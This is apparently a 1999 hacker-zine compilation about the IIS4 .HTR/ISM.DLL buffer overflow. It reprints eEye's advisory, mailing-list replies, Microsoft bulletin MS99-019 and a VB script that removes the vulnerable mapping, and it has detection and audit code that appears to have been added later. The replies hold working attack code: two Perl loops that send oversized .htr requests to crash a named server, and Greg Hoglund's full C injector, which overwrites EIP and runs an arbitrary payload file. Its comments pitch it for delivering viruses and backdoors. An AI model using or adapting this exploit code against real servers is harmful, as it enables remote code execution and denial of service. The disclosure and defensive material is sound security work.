Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services
J-037: W97M.Melissa Word Macro Virus
J-038: HP-UX Vulnerabilities (hpterm, ftp)
J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES
J-040: HP-UX Security Vulnerability in sendmail
J-041: Cisco IOS(R) Software Input Access List Leakage with NAT
J-042: Web Security
J-043: (bulletin in process)
@HWA
111.0 The IIS4 eEye security advisory and threads as mentioned previously
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Retina vs. IIS4, Round 2, KO
eEye - Digital Security Team (eeye@EEYE.COM)
Tue, 15 Jun 1999 12:18:16 -0000
Retina vs. IIS4, Round 2
Systems Affected:
Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4
Release Date:
June 8, 1999
Advisory Code:
AD06081999
Description:
We have been debating how to start out this advisory. How do you explain
that 90% or so of the Windows NT web servers on the Internet are open to a
hole that lets an attacker execute arbitrary code on the remote web server?
So the story starts...
The Goal:
Find a buffer overflow that will affect 90% of the Windows NT web servers on
the Internet. Exploit this buffer overflow.
The Theory:
There will be overflows in at least one of the default IIS filtered
extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take
place is that IIS will pass the full URL to the DLL that handles the
extension. Therefore if the ISAPI DLL does not do proper bounds checking it
will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to
execute arbitrary code on the remote server.
Entrance Retina:
At the same time of working on this advisory we have been working on the AI
mining logic for Retina's HTTP module. What better test scenario than this?
We gave Retina a list of 10 or so extensions common to IIS and instructed it
to find any possible holes relating to these extensions.
The Grind:
After about an hour Retina found what appeared to be a hole. It displayed
that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server.
We all crossed our fingers, started up the good ol' debugger and had Retina
hit the server again.
Note: [overflow] is 3k or so characters... but we will not get into the
string lengths and such here. View the debug info and have a look for
yourself.
The Registers:
EAX = 00F7FCC8 EBX = 00F41130
ECX = 41414141 EDX = 77F9485A
ESI = 00F7FCC0 EDI = 00F7FCC0
EIP = 41414141 ESP = 00F4106C
EBP = 00F4108C EFL = 00000246
Note: Retina was using "A" (0x41 in hex) for the character to overflow with.
If you're not familiar with buffer overflows a quick note would be that
getting our bytes into any of the registers is a good sign, and directly
into EIP makes it even easier :)
Explain This:
The overflow is in relation to the .HTR extensions. IIS includes the
capability to allow Windows NT users to change their password via the web
directory /iisadmpwd/. This feature is implemented as a set of .HTR files
and the ISAPI extension file ISM.DLL. So somewhere along the line when the
URL is passed through to ISM.DLL, proper bounds checking is not done and our
overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default
on IIS4 servers. Looks like we got our 90% of the Windows NT web servers
part down. However, can we exploit this?
The Exploit:
Yes. We can definitely exploit this and we have. We will not go into much
detail here about how the buffer is exploited and such. Read the comments in
the asm file for more information. However, one nice thing to note is that
the exploit has been crafted in such a way to work on SP4 and SP5 machines,
therefore there is no guessing of offsets and possible accidental crashing
of the remote server. We have not tested the exploit on SP3 and would love
to know if it works or not. eMail alert@eEye.com if you've successfully
exploited this hole on SP3.
For more details about the exploit visit the eEye web site at www.eEye.com
The Fallout:
Almost 90% of the Windows NT web servers on the Internet are affected by
this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves.
No, we did not try it on the above mentioned. But it is easy to verify if a
web server is exploitable without using the exploit. Even a server that's
locked in a guarded room behind a Cisco Pix can be broken into with this
hole. This is a reminder to all software vendors that testing for common
security holes in your software is a must. Demand more from your software
vendors.
The Request. (Well one anyway.)
Dear Microsoft,
One of the things that we found out is that IIS did not log any trace of our
attempted hack. We recommend that you pass all server requests to the
logging service before passing it to any ISAPI filters etc...The logging
service should be, as named, an actual service running in a separate memory
space so that when inetinfo goes down intrusion signatures are still logged.
Retina vs. IIS4, Round 2. KO.
Fixes:
1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just
updated their checklist to include this interim fix.
http://microsoft.com/security/products/iis/CheckList.asp
2. Apply the patch supplied by Microsoft when available.
http://microsoft.com/security
Vendor Status:
We contacted Microsoft on June 8th 1999; eEye Digital Security Team provided
all information needed to reproduce the exploit and how to fix it.
Microsoft's security team confirmed the exploit and is releasing a patch
for IIS.
Related Links
Advisory - On our web site
http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
Advisory - Retina Brain File used to uncover the hole
http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
Retina - The Network Security Scanner
http://www.eEye.com/retina/
Greetings go out to:
The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN
and any other security company or organization that believes in full
disclosure.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com
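Detection logic for the request pattern the advisory describes, as an added example (not eEye's or Retina's code): it classifies raw HTTP request lines, as a sensor in front of the server would see them, and flags `.HTR` targets that are oversized, built from a single filler byte, or requested outside `/iisadmpwd/`. The length and filler thresholds are assumptions, and the sample lines are constructed.

```python
"""Flag malformed .HTR requests (the ISM.DLL overflow pattern) in raw request lines."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed thresholds (not from the advisory): the password-change .HTR files
# live under /iisadmpwd/ and have short names, while the crashing requests
# discussed on this page carry roughly 2500-3500 filler characters.
MAX_HTR_PATH = 512
FILLER_MIN_LEN = 64   # only judge "filler" on file names at least this long
FILLER_RATIO = 0.5    # one byte value making up more than half of the name

REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Z]+) (?P<target>\S+) (?P<version>HTTP/\d\.\d)$"
)


@dataclass
class Finding:
    line_no: int
    method: str
    path_len: int
    severity: str
    reasons: List[str] = field(default_factory=list)


def _dominant_ratio(s: str) -> float:
    """Fraction of s made up of its single most common character."""
    if not s:
        return 0.0
    _, count = Counter(s).most_common(1)[0]
    return count / len(s)


def classify_request_line(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding if the request line looks like an ISM.DLL overflow attempt."""
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None                       # not an HTTP request line at all
    path = m.group("target").split("?", 1)[0]
    if not path.lower().endswith(".htr"):
        return None                       # ISM.DLL is only reached for .HTR targets
    reasons = []
    oversized = len(path) > MAX_HTR_PATH
    if oversized:
        reasons.append(f"oversized .htr path ({len(path)} > {MAX_HTR_PATH})")
    name = path.rsplit("/", 1)[-1][:-len(".htr")]
    filler = len(name) >= FILLER_MIN_LEN and _dominant_ratio(name) > FILLER_RATIO
    if filler:
        reasons.append("filler pattern in .htr file name")
    if not path.lower().startswith("/iisadmpwd/"):
        reasons.append(".htr requested outside /iisadmpwd/")
    if not reasons:
        return None
    severity = "high" if (oversized or filler) else "low"
    return Finding(line_no, m.group("method"), len(path), severity, reasons)


def scan(lines: List[str]) -> List[Finding]:
    """Run the classifier over every line and keep only the findings."""
    results = (classify_request_line(i, l) for i, l in enumerate(lines, 1))
    return [f for f in results if f is not None]


# Constructed sample request lines (not a real capture).
SAMPLE_LINES = [
    "GET /default.htm HTTP/1.0",
    "GET /iisadmpwd/change.htr HTTP/1.0",    # constructed, legitimate-looking name
    "GET /" + "A" * 3000 + ".htr HTTP/1.0",  # the pattern Retina sent (0x41 filler)
    "GET /" + "z" * 2600 + ".htr HTTP/1.0",  # the 'z' fill byte used further down the thread
    "POST /scripts/form.htr?x=1 HTTP/1.1",   # short, but outside /iisadmpwd/
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f.line_no} [{f.severity}] {f.method} len={f.path_len}: "
              + "; ".join(f.reasons))
```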
--------------------------------------------------------------------------------
Date: Tue, 15 Jun 1999 18:23:28 -0000
From: eEye - Digital Security Team
Subject: Update to IIS Remote Hole.
We have updated our advisory on our website,
http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
and as promised added a link to the working remote exploit,
http://www.eeye.com/database/advisories/ad06081999/ad06081999-exploit.html
Signed,
eEye Digital Security Team
http://www.eEye.com
--------------------------------------------------------------------------------
Re: Retina vs. IIS4, Round 2, KO
Ryan R Permeh (rrpermeh@RCONNECT.COM)
Tue, 15 Jun 1999 17:01:23 -0500
tested, this works for me... scripting was turned on... perl exploit
code follows:
#!/usr/bin/perl
#props to the absu crew
use Net::Telnet;
for ($i=2500;$i<3500;$i++)
{
$obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
print "$cmd\n";$obj->print("$cmd");
$obj->close;
}
--
----------------------------------------------------------------
Ryan R Permeh E-MAIL: rrpermeh@rconnect.com
IS Engineer WEB : http://www.rconnect.com
Rural Connections HELP : help@rconnect.com
FAQ : http://www.rconnect.com/help
SALES : sales@rconnect.com
----------------------------------------------------------------
120 First Street NE PHONE : (507) 281-5005
Rochester, MN 55906 FAX : (507) 281-9272
--------------------------------------------------------------------------------
Re: Retina vs. IIS4, Round 2, KO
Randal L. Schwartz (merlyn@STONEHENGE.COM)
Tue, 15 Jun 1999 16:59:08 -0700
>>>>> "Ryan" == Ryan R Permeh writes:
Ryan> #!/usr/bin/perl
Ryan> #props to the absu crew
Ryan> use Net::Telnet;
Ryan> for ($i=2500;$i<3500;$i++)
Ryan> {
Ryan> $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
Ryan> my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
Ryan> print "$cmd\n";$obj->print("$cmd");
Ryan> $obj->close;
Ryan> }
It's silly to use Net::Telnet for HTTP:
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr";
}
--
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying
Email: Snail: (Call) PGP-Key: (finger merlyn@teleport.com)
Web: My Home Page!
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me
--------------------------------------------------------------------------------
http://www.microsoft.com/security/bulletins/ms99-019.asp
Microsoft Security Bulletin (MS99-019)
Patch Available for Malformed HTR Request Vulnerability
Originally Posted: May 27, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in Microsoft
(r) Internet Information Server 4.0. The vulnerability could allow denial
of service attacks against an IIS server or, under certain conditions,
could allow arbitrary code to be run on the server.
Microsoft has issued this bulletin to advise customers of steps they can
take to protect themselves against this vulnerability. A patch to eliminate
this vulnerability is being developed, and an update to this bulletin will
be released to advise customers when it is available.
Issue
=====
IIS supports several file types that require server-side processing. When a
web site visitor requests a file of one of these types, an appropriate
filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL
that processes .HTR files. HTR files enable remote administration of user
passwords.
The vulnerability involves an unchecked buffer in ISM.DLL. This poses two
threats to safe operation. The first is a denial of service threat. A
malformed request for an .HTR file could overflow the buffer, causing IIS
to crash. The server would not need to be rebooted, but IIS would need to
be restarted. The second threat would be more difficult to exploit. A
carefully-constructed file request could cause arbitrary code to execute on
the server via a classic buffer overrun technique. Neither scenario could
occur accidentally. This vulnerability does not involve the functionality
of the password administration features of .HTR files.
While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing this bulletin to allow
customers to take appropriate action to protect themselves against it.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
What Microsoft is Doing
=======================
Microsoft has provided a workaround that fixes the problem identified.
The workaround is discussed below in What Customers Should Do.
Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.
What Customers Should Do
========================
Microsoft highly recommends that customers disable the script mapping
for .HTR files as follows:
- From the desktop, start the Internet Service Manager
by clicking Start | Programs | Windows NT 4.0 Option
Pack | Microsoft Internet Information Server | Internet
Service Manager
- Double-click "Internet Information Server"
- Right-click on the computer name and select Properties
- In the Master Properties drop-down box, select "WWW Service",
then click the "Edit" button.
- Click the "Home Directory" tab, then click the "Configuration"
button.
- Highlight the line in the extension mappings that contains ".HTR",
then click the "Remove" button.
- Respond "yes" to "Remove selected script mapping?", click OK 3 times,
and close ISM.
A patch will be available shortly to eliminate the vulnerability
altogether.
Customers should monitor http://www.microsoft.com/security for an
announcement when the patches are available.
Microsoft recommends that customers review the IIS Security Checklist
at http://www.microsoft.com/security/products/iis/CheckList.asp
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-019,
Workaround Available for "Malformed HTR Request" Vulnerability
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-019.asp.
- IIS Security Checklist,
http://www.microsoft.com/security/products/iis/CheckList.asp
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- June 15, 1999: Bulletin Created.
For additional security-related information about Microsoft products,
please visit http://www.microsoft.com/security
-------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 12:12:33 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Update to IIS Remote Hole.
Nelson Bunker has provided us with an VB app
which automates the process of updating your IIS 4.0 Metabase to remove
the ISM.DLL mappings which permit the eEye IISHack to work. Its a
temporary workaround while Microsoft continue to work on a proper fix
(which is expected today or tomorrow btw). For those of you with large
IIS installation, you might find this extremely useful.
If you use it, make sure you drop Nelson a line and thank him for it!
Check the NTBugtraq Home Page, http://ntbugtraq.ntadvice.com, in the
"What's New" section for links.
Cheers,
Russ - NTBugtraq Editor
For those of you who have too many IIS machines to yank this off by hand, here is some VB code to set your IIS metabase remotely... VB 5.0 SP3, IIS Resource Kit installed --
Metabase editor utility from the resource kit needs to be installed.
Have fun! You can set all of your metabase up with the tools mentioned above. :-)
Nelson Bunker
'The subs I put in Modules handle the App Mappings tab of the
'application configuration screen
Sub AppMappings(ByRef IIS)
    'delete all existing script paths
    Call DeleteAllLowerProperties(IIS, "ScriptMaps")
    'the only thing changed on script maps is htm & html mapped to
    'asp.dll and removed the ism.dll mapping
    newscriptmaps = _
        Array(".asa,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
              ".html,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
              ".asp,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
              ".cdx,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
              ".cer,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
              ".htm,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
              ".htw,C:\WINNT\System32\webhits.dll,3;", _
              ".ida,C:\WINNT\System32\idq.dll,3;", _
              ".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1;", _
              ".idq,C:\WINNT\System32\idq.dll,3;", _
              ".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1;", _
              ".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1;", _
              ".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1")
    IIS.PutEx 2, "ScriptMaps", newscriptmaps   'ADS_PROPERTY_UPDATE
    IIS.SetInfo
End Sub

Sub DeleteAllLowerProperties(ByRef IIS, ByVal PropertyName)
    'clear the property at every node below this one that sets it
    On Error Resume Next
    PathList = IIS.GetDataPaths(PropertyName, 1)   'IIS_DATA_INHERIT
    If Err.Number = 0 Then   'only walk the list if GetDataPaths succeeded
        For Each Path In PathList
            Set objScriptPath = GetObject(Path)
            objScriptPath.PutEx 1, PropertyName, True   'ADS_PROPERTY_CLEAR
            objScriptPath.SetInfo   'PutEx only changes the cache; commit it
        Next
    End If
End Sub

' Start form1 here
Function GetServerArray()
    GetServerArray = Array("Websvr1", ...., "WebsvrX")
End Function

Private Sub Form_Load()
    ServerArray = GetServerArray()
    For Each Server In ServerArray
        Set globalW3svc = GetObject("IIS://" & Server & "/W3SVC")
        Call AppMappings(globalW3svc)
    Next
End Sub
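An audit of the same ScriptMaps format that the VB code above writes, as an added example that is not Nelson Bunker's code: it parses each `.ext,dll,flags[,VERB,...]` entry, separates out anything routed to ISM.DLL or mapped to `.HTR` (the interim fix the bulletins describe), and serialises the remainder for writing back. The `ism.dll` path and flags in the sample `.htr` entry are constructed, not taken from a real metabase.

```python
"""Parse IIS 4 ScriptMaps entries and separate out the .HTR / ISM.DLL mapping."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ScriptMap:
    extension: str          # ".htr", ".asp", ...
    handler: str            # path of the ISAPI DLL
    flags: int              # numeric flags as stored in the metabase
    verbs: Tuple[str, ...]  # optional verb list (may be empty)

    def to_metabase(self) -> str:
        """Serialise back to the '.ext,dll,flags[,VERB,...]' string form."""
        return ",".join([self.extension, self.handler, str(self.flags), *self.verbs])


def parse_script_map(entry: str) -> ScriptMap:
    """Parse one ScriptMaps string. A trailing ';' (as in the VB array above)
    is tolerated and dropped; anything with fewer than three fields is rejected."""
    entry = entry.strip().rstrip(";")
    fields = entry.split(",")
    if len(fields) < 3:
        raise ValueError(f"malformed ScriptMaps entry: {entry!r}")
    ext, handler, flags, *verbs = fields
    if not ext.startswith("."):
        raise ValueError(f"extension must start with '.': {entry!r}")
    return ScriptMap(ext.lower(), handler, int(flags),
                     tuple(v.upper() for v in verbs if v))


def audit_script_maps(entries: List[str],
                      banned_handlers: Tuple[str, ...] = ("ism.dll",),
                      banned_exts: Tuple[str, ...] = (".htr",)
                      ) -> Tuple[List[ScriptMap], List[ScriptMap]]:
    """Return (kept, removed). An entry is removed if its handler DLL is on the
    banned list or its extension is, so .HTR goes even if the DLL path differs."""
    kept, removed = [], []
    for entry in entries:
        sm = parse_script_map(entry)
        dll = sm.handler.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if dll in banned_handlers or sm.extension in banned_exts:
            removed.append(sm)
        else:
            kept.append(sm)
    return kept, removed


# Constructed sample: the thirteen entries from the VB array above plus one
# constructed .htr -> ism.dll mapping standing in for the default installed one.
SAMPLE_SCRIPT_MAPS = [
    r".asa,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
    r".html,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
    r".asp,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
    r".cdx,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
    r".cer,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
    r".htm,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;",
    r".htw,C:\WINNT\System32\webhits.dll,3;",
    r".ida,C:\WINNT\System32\idq.dll,3;",
    r".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1;",
    r".idq,C:\WINNT\System32\idq.dll,3;",
    r".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1;",
    r".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1;",
    r".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1",
    r".htr,C:\WINNT\System32\inetsrv\ism.dll,1,GET,POST",   # constructed entry
]

if __name__ == "__main__":
    kept, removed = audit_script_maps(SAMPLE_SCRIPT_MAPS)
    for sm in removed:
        print("REMOVE:", sm.to_metabase())
    print("new ScriptMaps value:")
    for sm in kept:
        print("  ", sm.to_metabase())
```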
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 08:58:05 -0700
From: Greg Hoglund
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IIS Remote Exploit (injection code)
I read yesterday on eEye.com that they had discovered a buffer overflow in
IIS. I could not resist writing an exploit. I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code. However, this is meaningful for several reasons. Attached is the
injection code. The exploit will deliver any payload of your choosing.
Your payload will be executed. This empowers you to create a "collection"
of payloads that are not dependent upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
target's characterization.
The exploit was fairly simple to build. In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL. Within
minutes I had caused IIS to crash with EIP under my control. I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from. The pattern also made it easy to
determine where I was jumping around. Use the tekneek Danielson. ;-)
So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer. So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space. If you don't supply any mobile code to be
run, the injection vector will supply some for you. The default payload in
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are
very dangerous. It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, you're out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?
<--- snip
// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a number of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can be delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <winsock2.h> // header names restored; the angle-bracketed names were lost in extraction
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
if(argc < 2)
{
// usage text: the argument placeholders were lost in extraction and are
// restored from how argv[1] and argv[2] are used below
fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
"http://www.rootkit.com\nUsage: %s <target-ip> [payload-file]\n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(80);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char theSploit[4096];
// fill pattern
char kick = 'z'; //0x7a
char place = 'A';
// my uber sweet pattern gener@t0r
for(int i=0;i<4096;i+=4)
{
theSploit[i] = kick;
theSploit[i+1] = place;
theSploit[i+2] = place + 1;
theSploit[i+3] = place + 2;
if(++place == 'Y') // beyond 'XYZ'
{
place = 'A';
if(--kick < 'a') kick = 'a';
}
}
_snprintf(theSploit, 5, "get /");
_snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");
// after crash, looks like inetinfo.exe is jumping to the address
// stored @ location 'GHtG' (0x47744847)
// cross reference back to the buffer pattern, looks like we need
// to store our EIP into theSploit[598]
// magic eip into NTDLL.DLL
theSploit[598] = (char)0xF0;
theSploit[599] = (char)0x8C;
theSploit[600] = (char)0xF8;
theSploit[601] = (char)0x77;
// code I want to execute
// will jump foward over the
// embedded eip, taking us
// directly to the payload
theSploit[594] = (char)0x90; //nop
theSploit[595] = (char)0xEB; //jmp
theSploit[596] = (char)0x35; //
theSploit[597] = (char)0x90; //nop
// the payload. This code is executed remotely.
// if no payload is supplied on stdin, then this default
// payload is used. int 3 is the debug interrupt and
// will cause your debugger to "breakpoint" gracefully.
// upon examination you will find that you are sitting
// directly in this code-payload.
if(argc < 3)
{
theSploit[650] = (char) 0x90; //nop
theSploit[651] = (char) 0x90; //nop
theSploit[652] = (char) 0x90; //nop
theSploit[653] = (char) 0x90; //nop
theSploit[654] = (char) 0xCC; //int 3
theSploit[655] = (char) 0xCC; //int 3
theSploit[656] = (char) 0xCC; //int 3
theSploit[657] = (char) 0xCC; //int 3
theSploit[658] = (char) 0x90; //nop
theSploit[659] = (char) 0x90; //nop
theSploit[660] = (char) 0x90; //nop
theSploit[661] = (char) 0x90; //nop
}
else
{
// send the user-supplied payload from
// a file. Yes, that's a 2K buffer for
// mobile code. Yes, that's big.
FILE *in_file;
in_file = fopen(argv[2], "rb");
if(in_file)
{
int offset = 650;
while( (!feof(in_file)) && (offset < 3000))
{
theSploit[offset++] = fgetc(in_file);
}
fclose(in_file);
}
}
send(s, theSploit, strlen(theSploit), 0);
}
closesocket(s);
}
}
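As an added example that is not part of Hoglund's post or of eEye's tool: a check on HTTP request lines that flags the shape both exploits send, a .htr request whose path runs to thousands of bytes. The 1024-byte limit and the sample request lines are constructed assumptions; the post puts the overflowing URL at roughly 3000 characters.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed limit: a legitimate .htr request is a few dozen bytes, so a path
 * anywhere near the ~3000 characters eEye used stands out. */
#define HTR_PATH_LIMIT 1024

/* Locate the request-target in a request line ("GET /path HTTP/1.0").
 * Returns a pointer into line and sets *len, or NULL if there is no target. */
static const char *request_target(const char *line, size_t *len)
{
    const char *sp = strchr(line, ' ');
    if (sp == NULL) return NULL;
    const char *target = sp + 1;
    const char *end = strpbrk(target, " \r\n");
    if (end == NULL) end = target + strlen(target);
    *len = (size_t)(end - target);
    return target;
}

/* True if the path part (before any '?') ends in ".htr", case-insensitively;
 * IIS resolves extensions without regard to case, so ".HTR" counts too. */
static int path_is_htr(const char *target, size_t len)
{
    const char *q = memchr(target, '?', len);
    size_t plen = q ? (size_t)(q - target) : len;
    if (plen < 4) return 0;
    const char *ext = target + plen - 4;
    return ext[0] == '.'
        && tolower((unsigned char)ext[1]) == 'h'
        && tolower((unsigned char)ext[2]) == 't'
        && tolower((unsigned char)ext[3]) == 'r';
}

/* 1 = oversized .htr request (the overflow shape), 0 = ordinary request,
 * -1 = not a parsable request line. */
int flag_htr_overflow(const char *line)
{
    size_t len;
    const char *target = request_target(line, &len);
    if (target == NULL || len == 0) return -1;
    if (!path_is_htr(target, len)) return 0;
    return len > HTR_PATH_LIMIT ? 1 : 0;
}

/* Constructed request of the injector's shape, "GET /" + filler bytes of 'A'
 * + ".htr HTTP/1.0", run through the check. Returns flag_htr_overflow()'s result. */
int check_filler_request(size_t filler)
{
    static char buf[8192];
    const char *head = "GET /";
    const char *tail = ".htr HTTP/1.0\r\n";
    if (strlen(head) + filler + strlen(tail) + 1 > sizeof buf) return -1;
    memcpy(buf, head, strlen(head));
    memset(buf + strlen(head), 'A', filler);
    strcpy(buf + strlen(head) + filler, tail);
    return flag_htr_overflow(buf);
}

int main(void)
{
    /* constructed sample lines */
    printf("ordinary .htr request: %d\n",
           flag_htr_overflow("GET /scripts/change.htr HTTP/1.0\r\n"));
    printf("3000-byte filler:      %d\n", check_filler_request(3000));
    return 0;
}
```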
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 10:59:38 -0000
From: Marc
To: BUGTRAQ@netspace.org
Subject: Update to IIS hole.
Hi,
We have been receiving some eMails from people saying that the iishack.exe
on our website is not working for them and is just crashing the remote
server. Here is what we know and do not know etc..
